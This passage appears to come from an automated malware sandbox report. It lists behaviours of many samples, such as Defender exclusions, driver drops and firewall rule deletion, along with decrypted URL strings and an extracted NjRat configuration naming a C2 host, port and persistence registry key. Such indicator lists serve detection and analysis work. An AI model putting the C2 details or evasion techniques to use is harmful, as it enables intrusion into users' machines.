      • cmd.exe (PID: 8148)
      • cmd.exe (PID: 7896)
      • cmd.exe (PID: 9264)
      • cmd.exe (PID: 7560)
      • cmd.exe (PID: 7340)
      • cmd.exe (PID: 10664)
      • cmd.exe (PID: 1532)
      • cmd.exe (PID: 8748)
      • cmd.exe (PID: 10452)
      • cmd.exe (PID: 10568)
      • cmd.exe (PID: 8436)
      • cmd.exe (PID: 4436)
      • cmd.exe (PID: 7996)
      • cmd.exe (PID: 5484)
      • cmd.exe (PID: 9108)
      • cmd.exe (PID: 4672)
      • cmd.exe (PID: 7436)
      • cmd.exe (PID: 1176)
      • cmd.exe (PID: 9528)
      • cmd.exe (PID: 5708)
      • cmd.exe (PID: 9548)
      • cmd.exe (PID: 11984)
      • cmd.exe (PID: 10776)
      • cmd.exe (PID: 11196)
      • cmd.exe (PID: 11820)
      • cmd.exe (PID: 10936)
      • cmd.exe (PID: 10860)
      • cmd.exe (PID: 11592)
      • cmd.exe (PID: 12408)
      • cmd.exe (PID: 6892)
      • cmd.exe (PID: 12360)
      • cmd.exe (PID: 11804)
      • cmd.exe (PID: 5312)
      • cmd.exe (PID: 6904)
      • cmd.exe (PID: 10720)
      • cmd.exe (PID: 10800)
      • cmd.exe (PID: 12396)
    • The process connected to a server suspected of theft

      • MetaTrader.exe (PID: 8488)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 10208)
      • cmd.exe (PID: 9676)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 7324)
    • The process bypasses the loading of PowerShell profile settings

      • crypted.exe (PID: 9604)
      • cmd.exe (PID: 3332)
      • cmd.exe (PID: 6512)
      • cmd.exe (PID: 12132)
    • Drops a system driver (possible attempt to evade defenses)

      • svchogz.exe (PID: 5172)
      • we64.exe (PID: 3384)
    • Starts application with an unusual extension

      • cmd.exe (PID: 8148)
      • cmd.exe (PID: 7896)
      • cmd.exe (PID: 9264)
      • cmd.exe (PID: 7560)
      • cmd.exe (PID: 7340)
      • cmd.exe (PID: 10664)
      • cmd.exe (PID: 1532)
      • cmd.exe (PID: 10568)
      • cmd.exe (PID: 8748)
      • cmd.exe (PID: 10452)
      • cmd.exe (PID: 8436)
      • cmd.exe (PID: 4436)
      • cmd.exe (PID: 7996)
      • cmd.exe (PID: 5484)
      • cmd.exe (PID: 9108)
      • cmd.exe (PID: 4672)
      • cmd.exe (PID: 1176)
      • cmd.exe (PID: 7436)
      • cmd.exe (PID: 9528)
      • cmd.exe (PID: 5708)
      • cmd.exe (PID: 9548)
      • cmd.exe (PID: 11984)
      • cmd.exe (PID: 11196)
      • cmd.exe (PID: 10776)
      • cmd.exe (PID: 8388)
      • cmd.exe (PID: 10936)
      • cmd.exe (PID: 11592)
      • cmd.exe (PID: 10860)
      • cmd.exe (PID: 6892)
      • cmd.exe (PID: 12408)
      • cmd.exe (PID: 12360)
      • cmd.exe (PID: 11804)
      • cmd.exe (PID: 5312)
      • cmd.exe (PID: 6904)
      • cmd.exe (PID: 10800)
      • cmd.exe (PID: 10720)
      • cmd.exe (PID: 12396)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 10048)
      • cmd.exe (PID: 3020)
      • cmd.exe (PID: 9268)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 9844)
      • cmd.exe (PID: 11820)
      • Fast%20Download.exe (PID: 7272)
    • Uses powercfg.exe to modify the power settings

      • cmd.exe (PID: 10044)
    • Connects to FTP

      • tftp.exe (PID: 9204)
    • The process executes via Task Scheduler

      • PowerShell.exe (PID: 9500)
      • PowerShell.exe (PID: 10088)
      • PowerShell.exe (PID: 8532)
      • explorer.exe (PID: 9484)
      • explorer.exe (PID: 4104)
      • explorer.exe (PID: 10200)
      • explorer.exe (PID: 11408)
      • explorer.exe (PID: 11720)
      • explorer.exe (PID: 11720)
      • explorer.exe (PID: 11332)
      • explorer.exe (PID: 12168)
      • explorer.exe (PID: 7844)
      • PowerShell.exe (PID: 10984)
    • Script adds exclusion path to Windows Defender

      • f88253a.exe (PID: 10284)
    • Get information on the list of running processes

      • cmd.exe (PID: 8388)
      • cmd.exe (PID: 11800)
    • Windows service management via SC.EXE

      • sc.exe (PID: 11356)
      • sc.exe (PID: 9044)
      • sc.exe (PID: 11616)
    • Starts the AutoIt3 executable file

      • cmd.exe (PID: 8388)
    • Starts NET.EXE for network exploration

      • cmd.exe (PID: 13172)
    • Imports DLL using pinvoke

      • powershell.exe (PID: 12464)
      • powershell.exe (PID: 9416)
      • powershell.exe (PID: 12648)
    • Uses NETSH.EXE to delete a firewall rule or allowed programs

      • mos%20ssssttttt.exe (PID: 12568)
    • Suspicious use of NETSH.EXE

      • cmd.exe (PID: 11820)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 12464)
      • powershell.exe (PID: 9416)
      • powershell.exe (PID: 12648)
    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 2564)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 2564)
  • INFO

    • Manual execution by a user

      • 4363463463464363463463463.exe (PID: 1300)
      • 4363463463464363463463463.exe (PID: 4608)
      • viewer.exe (PID: 8092)
      • msedge.exe (PID: 10764)
      • cmd.exe (PID: 11744)
      • cmd.exe (PID: 9412)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 6372)
      • msiexec.exe (PID: 664)
      • msiexec.exe (PID: 4336)
      • msiexec.exe (PID: 10000)
      • msedge.exe (PID: 11292)
      • msiexec.exe (PID: 4028)
    • Checks proxy server information

      • 4363463463464363463463463.exe (PID: 4608)
      • td.exe (PID: 5404)
      • alphaTweaks.exe (PID: 1452)
      • powershell.exe (PID: 4452)
    • Checks supported languages

      • 4363463463464363463463463.exe (PID: 4608)
      • svchost.exe (PID: 1040)
      • td.exe (PID: 5404)
      • installer_ver09.10.25.exe (PID: 2656)
      • winsetaccess64.exe (PID: 660)
      • dksngdsg.exe (PID: 3896)
      • msiexec.exe (PID: 4336)
      • fusca%20game.exe (PID: 6272)
      • msiexec.exe (PID: 6708)
      • Microsoft_Hardware_Launch.exe (PID: 5600)
      • build.exe (PID: 4424)
      • alphaTweaks.exe (PID: 1452)
      • ale1.exe (PID: 5036)
      • ScottFinancials.pdf.exe (PID: 1164)
      • MSBuild.exe (PID: 616)
      • sound.exe (PID: 5072)
      • MSBuild.exe (PID: 6584)
      • services.exe (PID: 6800)
      • 5142A417D128494B9A9D67961121E943.exe (PID: 4188)
      • Update.exe (PID: 4228)
      • ddosziller.exe (PID: 780)
      • alex12312321.exe (PID: 6820)
      • SubDir.exe (PID: 3016)
      • MSBuild.exe (PID: 6244)
      • rah.exe (PID: 4464)
    • Reads the machine GUID from the registry

      • 4363463463464363463463463.exe (PID: 4608)
      • installer_ver09.10.25.exe (PID: 2656)
      • services.exe (PID: 6800)
      • build.exe (PID: 4424)
      • alphaTweaks.exe (PID: 1452)
      • fusca%20game.exe (PID: 6272)
      • 5142A417D128494B9A9D67961121E943.exe (PID: 4188)
      • Microsoft_Hardware_Launch.exe (PID: 5600)
      • Update.exe (PID: 4228)
      • rah.exe (PID: 4464)
      • SubDir.exe (PID: 3016)
      • ddosziller.exe (PID: 780)
    • Disables trace logs

      • 4363463463464363463463463.exe (PID: 4608)
      • alphaTweaks.exe (PID: 1452)
      • powershell.exe (PID: 4452)
    • Reads the computer name

      • 4363463463464363463463463.exe (PID: 4608)
      • td.exe (PID: 5404)
      • installer_ver09.10.25.exe (PID: 2656)
      • msiexec.exe (PID: 4336)
      • services.exe (PID: 6800)
      • msiexec.exe (PID: 6708)
      • Microsoft_Hardware_Launch.exe (PID: 5600)
      • alphaTweaks.exe (PID: 1452)
      • build.exe (PID: 4424)
      • MSBuild.exe (PID: 616)
      • ScottFinancials.pdf.exe (PID: 1164)
      • Update.exe (PID: 4228)
      • MSBuild.exe (PID: 6584)
      • 5142A417D128494B9A9D67961121E943.exe (PID: 4188)
      • ddosziller.exe (PID: 780)
      • fusca%20game.exe (PID: 6272)
      • rah.exe (PID: 4464)
      • SubDir.exe (PID: 3016)
      • MSBuild.exe (PID: 6244)
    • Process checks computer location settings

      • 4363463463464363463463463.exe (PID: 4608)
      • installer_ver09.10.25.exe (PID: 2656)
    • Reads the software policy settings

      • 4363463463464363463463463.exe (PID: 4608)
      • slui.exe (PID: 3096)
      • MSBuild.exe (PID: 616)
      • MSBuild.exe (PID: 6584)
      • MSBuild.exe (PID: 6244)
    • The sample compiled with chinese language support

      • td.exe (PID: 5404)
      • 5142A417D128494B9A9D67961121E943.exe (PID: 4188)
      • 4363463463464363463463463.exe (PID: 4608)
      • jf.exe (PID: 9804)
      • qrtb.exe (PID: 9764)
      • jd127.exe (PID: 1496)
      • jy.exe (PID: 11300)
    • Creates files or folders in the user directory

      • td.exe (PID: 5404)
      • Microsoft_Hardware_Launch.exe (PID: 5600)
      • services.exe (PID: 6800)
      • rah.exe (PID: 4464)
    • Create files in a temporary directory

      • td.exe (PID: 5404)
      • installer_ver09.10.25.exe (PID: 2656)
      • rundll32.exe (PID: 2064)
      • Microsoft_Hardware_Launch.exe (PID: 5600)
      • alphaTweaks.exe (PID: 1452)
    • The sample compiled with english language support

      • td.exe (PID: 5404)
      • 4363463463464363463463463.exe (PID: 4608)
      • Software.exe (PID: 8844)
      • msiexec.exe (PID: 4336)
      • Stub.exe (PID: 9828)
      • MetaTrader.exe (PID: 8488)
      • nvnc.exe (PID: 9584)
      • IMG001.exe (PID: 1748)
      • mixseven.exe (PID: 10688)
      • cryptography_module_windows.exe (PID: 9772)
      • jy.tmp (PID: 7508)
      • we64.exe (PID: 3384)
      • msedge.exe (PID: 11292)
      • Relay.com (PID: 9220)
      • cmd.exe (PID: 11820)
      • Hl2dm_Updater.exe (PID: 10272)
    • Creates files in the program directory

      • td.exe (PID: 5404)
      • 5142A417D128494B9A9D67961121E943.exe (PID: 4188)
    • CONNECTWISE has been detected

      • msiexec.exe (PID: 664)
    • Reads Environment values

      • alphaTweaks.exe (PID: 1452)
      • rah.exe (PID: 4464)
      • SubDir.exe (PID: 3016)
    • Attempting to use instant messaging service

      • MSBuild.exe (PID: 6584)
      • MSBuild.exe (PID: 7420)
      • Stub.exe (PID: 6264)
    • Manages system restore points

      • SrTasks.exe (PID: 7924)
      • SrTasks.exe (PID: 9620)
    • Drops encrypted JS script (Microsoft Script Encoder)

      • sound.exe (PID: 5072)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 4336)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4452)
    • Starts MODE.COM to configure console settings

      • mode.com (PID: 9160)
      • mode.com (PID: 8224)
      • mode.com (PID: 9448)
      • mode.com (PID: 9556)
      • mode.com (PID: 9468)
      • mode.com (PID: 9632)
    • Application launched itself

      • chrome.exe (PID: 8936)
      • msedge.exe (PID: 10764)
      • msedge.exe (PID: 9500)
    • Checks operating system version

      • Stub.exe (PID: 6264)
    • Changes the display of characters in the console

      • cmd.exe (PID: 8148)
      • cmd.exe (PID: 7896)
      • cmd.exe (PID: 9264)
      • cmd.exe (PID: 7560)
      • cmd.exe (PID: 10664)
      • cmd.exe (PID: 7340)
      • cmd.exe (PID: 1532)
      • cmd.exe (PID: 8748)
      • cmd.exe (PID: 10568)
      • cmd.exe (PID: 8436)
      • cmd.exe (PID: 10452)
      • cmd.exe (PID: 7996)
      • cmd.exe (PID: 5484)
      • cmd.exe (PID: 4436)
      • cmd.exe (PID: 9108)
      • cmd.exe (PID: 4672)
      • cmd.exe (PID: 1176)
      • cmd.exe (PID: 7436)
      • cmd.exe (PID: 9528)
      • cmd.exe (PID: 5708)
      • cmd.exe (PID: 9548)
      • cmd.exe (PID: 11984)
      • cmd.exe (PID: 11196)
      • cmd.exe (PID: 10776)
      • cmd.exe (PID: 10860)
      • cmd.exe (PID: 11592)
      • cmd.exe (PID: 10936)
      • cmd.exe (PID: 12408)
      • cmd.exe (PID: 6892)
      • cmd.exe (PID: 12360)
      • cmd.exe (PID: 6904)
      • cmd.exe (PID: 11804)
      • cmd.exe (PID: 5312)
      • cmd.exe (PID: 12396)
      • cmd.exe (PID: 10800)
      • cmd.exe (PID: 10720)
    • The sample compiled with korean language support

      • 4363463463464363463463463.exe (PID: 4608)
    • The sample compiled with arabic language support

      • 1465810408079_502.exe (PID: 10276)
    • Creates a new folder

      • cmd.exe (PID: 11364)
    • The sample compiled with japanese language support

      • we64.exe (PID: 3384)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

xor-url

(PID) Process(5404) td.exe
Decrypted-URLs (6)http://help.xunlei.com/
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://purl.org/dc/elements/1.1/
http://www.w3.org/1999/02/22-rdf-syntax-ns#
Decrypted-URLs (19)http://jump.xunlei.com/jump/?jump_key=
http://ns.adobe.com/photoshop/1.0/
http://ns.adobe.com/xap/1.
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/rights/
http://ns.adobe.com/xap/1.0/sType/Reso
http://ns.adobe.com/xap/1.0/sType/ResourceEveZ@
http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://plugin.xl7.xunlei.com/7.9/normal/md5.xml
http://purl.org/dc/elements/1.1/
http://stat.channel.xunlei.com/report?cmd=
http://stat.channel.xunlei.com/report?cmd=error&userno=
http://stat.channel.xunlei.com/report?cmd=show&userno=
http://www.w3.org/1999/
http://www.w3.org/1999/0
http://www.w3.org/1999/02/22-rdf-syntax-ns#
http://yangtai.xunlei.com/?p=593
Decrypted-URLs (7)http://ns.adobe.com/photoshop/1.0/
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://purl.org/dc/elements/1.1/
http://www.w3.org/1999/02/22-rdf-syntax-ns#
Decrypted-URLs (21)http://help.xunlei.com/
http://ns.adobe.com
http://ns.adobe.com/exif/1.0/
http://ns.adobe.com/photoshop/1.0/
http://ns.adobe.com/tiff/1.0/
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/rights/
http://ns.adobe.com/xap/1.0/sType/Resou
http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://ns.adobe.com/xap/1.04vv49;cvwuh!hoI~
http://ns.adobe.comL
http://purl.org/dc/eleNFMWP
http://purl.org/dc/elements/1.1/
http://www.w3.org/
http://www.w3.org/1999
http://www.w3.org/1999/02/2)6i
http://www.w3.org/1999/02/22-r
http://www.w3.org/1999/02/22-rdf-syntax-ns#
http://www.w3.org/1999/02/2iv)?=v(
Decrypted-URLs (36)http://jifen.xunlei.com/help.html
http://jifen.xunlei.com/jifen
http://jifen.xunlei.com/myinfo
http://jsq.xunlei.com/?referfrom=jsq_xljsb_mission
http://jump.xunlei.com/jump/?jump_key=
http://ns.adobe
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/rights/
http://ns.adobe.com/xap/1.0/sT
http://ns.adobe.com/xap/1.0/sType/R
http://ns.adobe.com/xap/1.0/sType/Reso
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://ns.adobe.comH
http://pay.vip.xunlei.com/index.html?referfrom=JS_016
http://pay.vip.xunlei.com/index.html?referfrom=JS_017
http://pay.vip.xunlei.com/index.html?referfrom=JS_018
http://pay.vip.xunlei.com/index.html?referfrom=JS_019
http://pay.vip.xunlei.com/index.html?referfrom=JS_020
http://pay.vip.xunlei.com/index.html?referfrom=JS_021
http://pay.vip.xunlei.com/index.html?referfrom=JS_022
http://pay.vip.xunlei.com/index.html?referfrom=JS_023
http://pay.vip.xunlei.com/index.html?referfrom=JS_024
http://pay.vip.xunlei.com/index.html?referfrom=JS_025
http://pay.vip.xunlei.com/index.html?referfrom=JS_027
http://pay.vip.xunlei.com/index.html?referfrom=JS_028
http://plugin.xl7.xunlei.com/7.9/normal/updateintro
http://purl.org/dc/elements/1.1/
http://svr.jinbi.client.xunlei.com/ad/?_t=
http://vip.xunlei.com/fast_xl/update.html
http://www.w3.org/1999/02/22-rdf-s8/5
http://www.w3.org/1999/02/22-rdf-syntax-ns#
http://www.w3.org/1999/02/22-rdf-synt~g2ql
http://www.w35ti
http://www.xunlei.com
http://xl7xml.client.xunlei.com/7.9/thunder_stat2.xml
Decrypted-URLs (62)http://help.xunlei.com/
http://i.xunlei.com/register.html?
http://images.client.vip.xunlei.com/fast_xl1525s;/(8s;=3/)
http://images.client.vip.xunlei.com/fast_xlmini/gstd/after.html
http://images.client.vip.xunlei.com/fast_xlmini/gstd/before.html
http://images.client.vip.xunlei.com/fast_xlmini/gstd/expired/pay.html?referfrom=GSMN_129
http://images.client.vip.xunlei.com/fast_xlmini/gstd/gaosu_tips/
http://images.client.vip.xunlei.com/fast_xlmini/lxxz/after.html
http://images.client.vip.xunlei.com/fast_xlmini/lxxz/before.html
http://images.client.vip.xunlei.com/fast_xlmini/lxxz/expired/pay.html?referfrom=LXMN_85
http://images.client.vip.xunlei.com/gaosu/gaosu_trial_new/?name=
http://images.client.vip.xunlei.com/gaosu/lixian_trial7.9/?name=
http://images.client.vip.xunlei.com/mini/dongjie.html
http://img.user.kanimg.com/usrimg/
http://interface.reg.vip.xunlei.com/service/used2be?userid=
http://jump.xunlei.com/jump/?jump_key=
http://lixian.vip.xunlei.com/
http://lixian.vip.xunlei.com/getantiurls
http://lixian.vip.xunlei.com/task.html
http://lixian.xunlei.com/
http://lixian.xunlei.com/lxty.html
http://login.xunlei.com/jump/?u1=
http://media.info.client.xunlei.com/smalloperator_config.xml
http://media.info.client.xunlei.com/vipservice_config.xml
http://ns.adcni
http://ns.adobe.com/xa
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://ns.adobe.com/xap/1.0s/
http://ns.adobe.com/xap/=
http://ns.adobe.coq3d
http://pay.vip.xunlei.com/?referfrom=JS_014
http://pay.vip.xunlei.com/?referfrom=VIP_3141
http://pay.vip.xunlei.com/experiment6.html?referfrom=GS_117
http://pay.vip.xunlei.com/experiment6.html?referfrom=GS_118
http://pay.vip.xunlei.com/experiment6.html?referfrom=GS_119
http://pay.vip.xunlei.com/experiment6.html?referfrom=GS_120
http://pay.vip.xunlei.com/experiment6.html?referfrom=GS_121
http://pay.vip.xunlei.com/experiment6.html?referfrom=GS_122
http://pay.vip.xunlei.com/experiment6.html?referfrom=LX_152
http://pay.vip.xunlei.com/experiment6.html?referfrom=pc_jsb_gs_kt_tria_link_end
http://pay.vip.xunlei.com/experiment6.html?referfrom=pc_jsb_gs_kt_tria_link_ing
http://pay.vip.xunlei.com/experiment6.html?referfrom=pc_jsb_gs_kt_tria_tips_end
http://pay.vip.xunlei.com/experiment6.html?referfrom=pc_jsb_gs_kt_tria_tips_end5min
http://pay.vip.xunlei.com/experiment6.html?referfrom=pc_jsb_gs_kt_tria_tips_ing
http://pay.vip.xunlei.com/index.html?referfrom=GS_144
http://pay.vip.xunlei.com/index.html?referfrom=LX_132
http://pay.vip.xunlei.com/index.html?referfrom=LX_162
http://pay.vip.xunlei.com/upgrade_pay.html?referfrom=LX_111
http://purl.org/dc/elements/1.1/
http://vip.xunlei.com/active/channel.html
http://vip.xunlei.com/freedom/exclusive_channel.html
http://vip.xunlei.com/freedom/gaosu_detail.html
http://vip.xunlei.com/freedom/lixian.html
http://vip.xunlei.com/help/vip_notice.html?id=7424
http://vip.xunlei.com/vip_service/freedom/gstdll.html
http://vod.xunlei.com/share.html
http://www.w3
http://www.w3.org/1955#
http://www.w3.org/1999/02/22-rdf-syntax-ns#
http://xcloud.xunlei.com/play/i.html?url=
Decrypted-URLs (1)http://xmp.down.sandai.net/kankan/XMPSetupLite-xl8.exe
Decrypted-URLs (11)http://jump.xunlei.com/jump/?u1=
http://ns.adobe.com/exif/1.0/
http://ns.adobe.com/photoshop/1.0/
http://ns.adobe.com/tiff/1.0/
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://pc.xl9.xunlei.com/index.html
http://purl.org/dc/elements/1.1/
http://www.w3.org/1999/02/22-rdf-syntax-ns#
Decrypted-URLs (14)http://bbs.xunlei.com/thread-371104-1-1.html
http://dm.xiazaibao.xunlei.com/
http://images.client.vip.xunlei.com/fast_xlmini/lxxz/after.html
http://jump.xunlei.com/jump/?jump_key=
http://mobile.xunlei.com
http://ns.ado
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://pc.xl9.xunlei.com/index.html
http://www.w3.org/1999/0
http://www.w3.org/1999/02/22-rdf-syntax-ns#
http://yuancheng.xunlei.com
http://yuancheng.xunlei.com/login.html#a=newtask&url=
Decrypted-URLs (26)http://bbs.xunlei.com/thread-371104-1-1.html
http://homecloud.yuancheng.xunlei.com/boxSpace?pid=
http://homecloud.yuancheng.xunlei.com/del?pid=
http://homecloud.yuancheng.xunlei.com/getBtSubList?pid=
http://homecloud.yuancheng.xunlei.com/list?pid=
http://homecloud.yuancheng.xunlei.com/listPeer?v=2&ct=9&type=0
http://homecloud.yuancheng.xunlei.com/openLixianChannel?pid=
http://homecloud.yuancheng.xunlei.com/openVipChannel?pid=
http://homecloud.yuancheng.xunlei.com/pause?pid=
http://homecloud.yuancheng.xunlei.com/rename?pid=
http://homecloud.yuancheng.xunlei.com/restore?pid=
http://homecloud.yuancheng.xunlei.com/settings?pid=
http://homecloud.yuancheng.xunlei.com/start?pid=
http://homecloud.yuancheng.xunlei.com/unbind?pid=
http://images.client.vip.xunlei.com/fast_xlmini/lxxz/after.html
http://jump.xunlei.com/jump/?jump_key=
http://mobile.xunlei.com
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/jj(%'
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://www.w3.org/1999/02/22-rdf-syn
http://www.w3.org/1999/02/22-rdf-syntax-ns#
http://yuancheng.xunlei.com
http://yuancheng.xunlei.com/binding.html?sessionid=
http://yuancheng.xunlei.com/login.html#a=newtask&url=
Decrypted-URLs (135)http://a.sjzhushou.com/static/apk/XunleiAppMarket.apk
http://a.sjzhushou.com/xlpc/matchUpdateApk?version=%s&peerid=%s&channelId=%s&versionDir=1
http://a.sjzhushou.com/xlpc/matchXunleiApk?version=%s&peerid=%s&channelId=%s&versionDir=1
http://act.vip.xunlei.com/xunlei7.9/
http://aq.xunlei.com/password_find.html
http://aq.xunlei.com/password_index.html
http://bbs.xunlei.com/forum-168-1.html
http://biz4.sandai.net/ad/thunder8/show/adtask.xml
http://biz4.sandai.net/ad/thunder8/show/newadtask.xml
http://bolt.xunlei.com
http://cj.xunlei.com
http://convurl.com/.*
http://dl.xunlei.com/xl7.9/intro.html
http://down.qq.com/cf/full/CrossFire_OBV172_Full.exe
http://dyactive2.vip.xunlei.com/fast_xlmini/?type=updateTime
http://dynamic.i.xunlei.com/client/pop.php?userid=
http://dynamic.i.xunlei.com/register/register1/?referfrom=XL7_001
http://dynamic.vip.xunlei.com/paycenter/index/payway/wy/month/12?referfrom=XL7_02
http://dynamic.vip.xunlei.com/paycenter/index?referfrom=GSMN_114
http://fangliang.client.xunlei.com/group_selected?group=
http://fangliang.client.xunlei.com/is_selected?pid=
http://hao.xunlei.com/?referfrom=XL7_03
http://help.xunlei.com/
http://i.vod.xunlei.com/xl_screenshot_proxy?height=93&width=148&number=4&req_list=23534F019D599AFC6B458F3BC3E97002823CE517
http://i.xunlei.com/clients/login/login.html
http://i.xunlei.com/register.html?referfrom=XL7_008
http://i.xunlei.com/uc4thunder7.html?referfrom=XL_1001
http://images.client.vip.xunlei.com/fast_xlmini/gstd/gaosu_tips/
http://images.client.vip.xunlei.com/fast_xlmini/lxxz/after.html
http://images.client.vip.xunlei.com/fast_xlmini/lxxz/before.html
http://images.client.vip.xunlei.com/fast_xlmini/lxxz/expired/pay.html?referfrom=LXMN_85
http://images.client.vip.xunlei.com/fast_xlmini/vip/after.html
http://images.client.vip.xunlei.com/fast_xlmini/vip/before.html
http://images.client.vip.xunlei.com/fast_xlmini/vip/index.html
http://images.client.vip.xunlei.com/mini/dongjie.html
http://images.client.vip.xunlei.com/mini7/vip_platform.html?referfrom=XL7_04
http://jifen.xunlei.com
http://jifen.xunlei.com/call?c=user&a=getScore&userid=
http://jifen.xunlei.com/call?c=user&a=getWeixinDaySignScore&userid=
http://jifen.xunlei.com/call?c=user&a=weixinSign&userid=
http://jump.xunlei.com/jump/?ju
http://jump.xunlei.com/jump/?jump_key=
http://kuai.xunlei.com/
http://lixian.vip.xunlei.com/xunlei_task.html?referfrom=XL7_07
http://logic.cpm.client.sandai.net/c
http://logic.cpm.client.sandai.net/clientadrequest?positionid=1871&cachetime=
http://logic.cpm.client.sandai.net/clientadrequest?positionid=1872&cachetime=
http://logic.xl7.sandai.net/myipinfo?pid=
http://logic.xl7.sandai.net/updatemynetspeed?type=1&peerid=
http://m.down.sandai.net/MobileThunder/Android/xlcs.apk
http://m.xunlei.com/detail_xl_android.html
http://map.xl7.xunlei.com/map/citylist.xml
http://material.xl7.xunlei.com/rcfg/search/searchword.xml
http://media.info.client.xunlei.com/ThunderPush/ThunderPush.
http://ns.BGLAF
http://ns.adobe.com/exif/1.0/
http://ns.adobe.com/photoshop/1.0/
http://ns.adobe.com/tiff/1.0/
http://ns.adobe.com/x
http://ns.adobe.com/xap/
http://ns.adobe.com/xap/1.
http://ns.adobe.com/xap/1.0/
http://ns.adobe.com/xap/1.0/mm/
http://ns.adobe.com/xap/1.0/rigWKL
http://ns.adobe.com/xap/1.0/rights/
http://ns.adobe.com/xap/1.0/sT
http://ns.adobe.com/xap/1.0/sType/R
http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
http://ns.adobe.com/xap/1.0/sType/ResourceRef#
http://pay.vip.xunlei.com/?referfrom=GSMN_117
http://pay.vip.xunlei.com/index.html?referfrom=
http://pay.vip.xunlei.com/index.html?referfrom=JS_013
http://pay.vip.xunlei.com/index.html?referfrom=LX_110
http://pay.vip.xunlei.com/index.html?referfrom=pc_jsb_gs_kt_bubb_novip
http://pay.vip.xunlei.com/jsq.html?refresh=1&referfrom=XL7_101
http://play.free.vod.xunlei.com/page/GCPlayer/GCPlayer.html?from=xl7_vod_free_play_1.0.0&url=
http://plugin.xl7.xunlei.com/7.9/normal/freegcidlist.xml
http://proxy.v.client.xunlei.com/xl_screenshot_proxy?height=93&width=148&number=4&req_list=
http://purl.org/dc/eleme
http://purl.org/dc/elements/
http://purl.org/dc/elements/1.1/
http://search.kankan.com/search.php?keyword=%s&id=705&bid=4
http://skin.client.xunlei.com/7.9/
http://skin.client.xunlei.com/thunder7
http://smallfiles.client.xunlei.com/config.ini
http://smallfiles.client.xunlei.com/pop.php
http://static.client.xunlei.com/game/black.xml
http://static.client.xunlei.com/game/white2.xml
http://suggest.client.xunlei.com/feedback.html?version=
http://t.163.com/article/user/checkLogin.do?&source=
http://t.cn/.*
http://t.itc.cn/.*
http://tinyurl.com/create.php?url=
http://url.cn/.*
http://v.t.qq.com/share/share.php?title=
http://v.t.qq.com/share/share.php?title=&summary=
http://v.t.sina.com.cn/share/share.php?title=
http://vip.xunlei.com/?referfrom=XL7_004
http://vip.xunlei.com/?referfrom=XL7_006
http://vip.xunlei.com/?referfrom=XL7_01
http://vip.xunlei.com/fast_xl/
http://vip.xunlei.com/freedom/exclusive_channel.html?referfrom=XL7_08
http://vip.xunlei.com/freedom/index.html
http://vip.xunlei.com/freedom/index.html?referfrom=XL7_09
http://vip.xunlei.com/freedom/score_improve.html
http://vip.xunlei.com/my_freedom/mygrown.html
http://vip.xunlei.com/vip_service/freedom/sjjs.html
http://vip.xunlei.com/vip_service/qyzh.html
http://vod.xunlei.com/share.html
http://www.a.com/(*).zip
http://www.a.com/01.zip
http://www.a.com/02.zip
http://www.a.com/10.zip
http://www.baidu.com/s?wd=%s&tn=webxunlei_1_dg
http://www.connect.renren.com/share/sharer?url=
http://www.google.com/search?q=%s
http://www.kaixin001.com/~repaste/repaste.php?rtitle=
http://www.w3.org/
http://www.w3.org/1
http://www.w3.org/1999/02/22-rdf-s
http://www.w3.org/1999/02/22-rdf-sy
http://www.w3.org/1999/02/22-rdf-synt
http://www.w3.org/1999/02/22-rdf-syntB[
http://www.w3.org/1999/02/22-rdf-syntRK
http://www.w3.org/1999/02/22-rdf-syntax-ns#
http://www.w3.org/19jj
http://www.xunlei.com
http://www.xunlei.com/
http://xl7xml.client.xunlei.com/7.9/AppCollectionConf_
http://xl7xml.client.xunlei.com/7.9/NavigateBarConfNew_
http://xl7xml.client.xunlei.com/7.9/NavigateBarConf_
http://xl7xml.client.xunlei.com/7.9/onlineskin.xml
http://xmp.down.sandai.net/
http://xmp.down.sandai.net/kankan/XMPSetupLite-xl8.exe
http://yangtai.xunlei.com/?p=593

NjRat

(PID) Process(5600) Microsoft_Hardware_Launch.exe
C2micrsoft.con-ip.com
Ports8888
BotnetVicTam :D
Options
Auto-run registry keySoftware\Microsoft\Windows\CurrentVersion\Run\67ff3a880cd1a5cd235418c7516e5812
Splitter|'|'|
Version0.7d
(PID) Process(6272) fusca%20game.exe
